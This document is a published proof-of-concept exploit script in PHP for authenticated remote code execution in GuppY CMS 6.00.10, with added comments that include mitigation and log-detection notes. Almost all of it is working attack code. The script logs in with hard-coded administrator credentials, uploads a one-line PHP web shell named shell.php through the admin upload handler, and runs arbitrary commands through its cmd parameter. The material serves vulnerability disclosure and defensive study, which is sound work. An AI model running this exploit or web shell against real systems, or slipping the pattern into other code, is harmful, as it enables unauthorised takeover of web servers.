
# Exploit Title: GuppY CMS v6.00.10 - Remote Code Execution
# Date: Sep 30, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.freeguppy.org/
# Software Link:
https://www.freeguppy.org/fgy6dn.php?lng=en&pg=279927&tconfig=0#z2
# Version: 6.00.10
# Tested on: Linux
#!/usr/bin/php
<?php

// Proof-of-concept as published above. Flow, in three cURL requests on one
// handle that shares a cookie jar: (1) log in to guppy/connect.php as the
// administrator, (2) post a hand-built multipart body to the admin upload page,
// (3) GET the uploaded file with the -c value as its cmd= query parameter.
// Only the presence of -u and -c is checked; every other value is hard-coded.
//
// Defender notes (everything below is visible in this listing): the admin
// upload handler at guppy/admin/admin.php?pg=upload accepted a part named
// "ficup" whose filename ends in .php, and the result was served from
// guppy/file/ (step 3 requests guppy/file/shell.php). Denying script
// execution under guppy/file/ at the web-server layer and allow-listing
// upload extensions both close this class of issue. In access logs the
// sequence is a POST to connect.php, a POST to admin.php?pg=upload, then GETs
// to guppy/file/<name>.php carrying a cmd= parameter.

$username = "Admin2"; //Administrator username (hard-coded; the PoC assumes this account exists)
$password = "rose1337"; //Administrator password (hard-coded)

// -u: target base URL ending in "/", -c: command string passed to the uploaded file.
$options = getopt('u:c:');

if(!isset($options['u'], $options['c']))
die("\n GuppY 6.00.10 CMS Remote Code Execution \n Author: Chokri Hammedi
\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n

\n");

$target = $options['u'];
$command = $options['c'];

// Administrator login
// The session cookie is written to cookie.txt in the current working directory
// and is never removed by this script (no unlink() anywhere in the file).
$cookie="cookie.txt";
$url = "{$target}guppy/connect.php";

// Credentials are sent unencoded in the POST body.
$postdata = "connect=on&uuser=old&pseudo=".$username."&uid=".$password;
$curlObj = curl_init();

curl_setopt($curlObj, CURLOPT_URL, $url);
curl_setopt($curlObj, CURLOPT_RETURNTRANSFER, 1);
// Response headers are included in the returned body from here until
// CURLOPT_HEADER is set back to False before the third request.
curl_setopt($curlObj, CURLOPT_HEADER, 1);
// TLS certificate validation is disabled for the whole handle.
curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt ($curlObj, CURLOPT_POSTFIELDS, $postdata);
curl_setopt ($curlObj, CURLOPT_POST, 1);
CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);
CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);
CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);
CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);
curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");
curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");
// The login response is stored but never inspected; a failed login is only
// noticed indirectly through the HTTP status of the third request.
$result = curl_exec($curlObj);

// uploading shell
// The multipart body is assembled by hand with a fixed boundary; the line
// endings are whatever this source file uses (no explicit "\r\n").
// NOTE(review): whether the server accepts bare "\n" separators is not shown
// here — assume it did on the tested version.
$url2 = "{$target}guppy/admin/admin.php?lng=en&pg=upload";

$post='------WebKitFormBoundarygA1APFcUlkIaWal4
Content-Disposition: form-data; name="rep"

file
------WebKitFormBoundarygA1APFcUlkIaWal4
Content-Disposition: form-data; name="ficup"; filename="shell.php"
Content-Type: application/x-php

<?php system($_GET["cmd"]); ?>

------WebKitFormBoundarygA1APFcUlkIaWal4--
';

// The boundary in this header must match the one used in $post above.
$headers = array(
'Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygA1APFcUlkIaWal4',
'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36',

'Accept-Encoding: gzip, deflate',
'Accept-Language: en-US,en;q=0.9'
);

curl_setopt($curlObj, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curlObj, CURLOPT_URL, $url2);
curl_setopt($curlObj, CURLOPT_POSTFIELDS, $post);
curl_setopt($curlObj, CURLOPT_POST, true);
curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);
CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);
CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);
CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);
CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);
curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");
curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");

// Upload response is likewise stored and never checked.
$data = curl_exec($curlObj);

// Executing the shell
// Third request: plain GET (CURLOPT_POST is switched off below) to the path
// where the upload handler placed the file; $command rides in the cmd= query
// parameter exactly as given on the command line.
$shell = "{$target}guppy/file/shell.php?cmd=" .$command;
curl_setopt($curlObj, CURLOPT_URL, $shell);
// Replaces the multipart header set from the previous request.
curl_setopt($curlObj, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, False);
CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);
curl_setopt($curlObj, CURLOPT_HEADER, False);
curl_setopt($curlObj, CURLOPT_POST, false);

$exec_shell = curl_exec($curlObj);

// Only the status of the final request is examined; any earlier failure
// (login rejected, upload refused) surfaces here as a non-200 code.
$code = curl_getinfo($curlObj, CURLINFO_HTTP_CODE);

if($code != 200) {
// "\e[5m\033[31m" are terminal escape codes (blink, red); the message text is
// printed regardless of the actual failure reason.
echo "\n\n \e[5m\033[31m[-]Something went wrong! \n [-]Please check the credentials\n";
}
else {
print("\n");
print($exec_shell);
}
curl_close($curlObj);

?>